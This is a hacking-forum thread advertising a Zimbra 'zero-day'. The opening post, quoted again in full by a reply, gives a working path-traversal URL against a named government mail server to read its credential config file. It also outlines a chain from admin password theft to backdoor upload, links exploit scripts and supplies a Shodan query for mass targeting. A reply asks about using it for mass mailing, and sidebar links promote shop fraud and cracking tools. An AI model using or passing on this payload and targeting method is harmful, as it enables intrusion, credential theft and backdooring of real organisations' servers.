Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
WebMailer Zimbra 0day + Tools (Perl)
#1
Thumbsup 
[Image: q0UwTjjH_400x400.jpg]


Test:

https://ncs.norwoodma.gov:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214%E2%80%8B175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml


Protocol:

(Perl Script Execution = Insertar Target = Config Administrator Password Explotation = Login = Backdoor Upload)

Scripts:

https://github.com/nulsec/zimbra-0day

Shodan Search:

https://www.shodan.io/search?query=port%3A7071+title%3Azimbra+

Ready..


Ban reason: Carding is against the rules. (Permanent)
Reply
#2
(03-04-2018, 12:10 AM)securityteam Wrote:  [Image: q0UwTjjH_400x400.jpg]


Test:

https://ncs.norwoodma.gov:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214%E2%80%8B175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml


Protocol:

(Perl Script Execution = Insertar Target = Config Administrator Password Explotation = Login = Backdoor Upload)

Scripts:

https://github.com/nulsec/zimbra-0day

Shodan Search:

https://www.shodan.io/search?query=port%3A7071+title%3Azimbra+

Ready..



SO this exploit will get you into mass mailing and other web mail servers ?
Reply
#3
this is not the same as https://0day.today/exploit/description/29490 who seems to be a CSRF dont?
Reply
 


Possibly Related Threads...
Thread Author Replies Views Last Post
  Hans Conkel - How to Open Locks with Improvised Tools BoringApe 0 95 5 hours ago
Last Post: BoringApe
  Matt Blaze - Notes On Picking And Torque Tools For Pin Tumbler Locks BoringApe 0 90 5 hours ago
Last Post: BoringApe
Thumbsup gilt.com method + tools (get stuff from webshop for free!) BoringApe 2 262 10-01-2018, 12:34 PM
Last Post: kine
  Mega Pack Cracking Tools By Stefy 2017 Atoshi 6 2,067 09-15-2018, 06:01 AM
Last Post: shinigamielite
  0day WP Plugin Post Start Rating SQli Injection By KelvinSecTeam securityteam 4 650 05-22-2018, 04:27 PM
Last Post: TantaNata



Users browsing this thread: 1 Guest(s)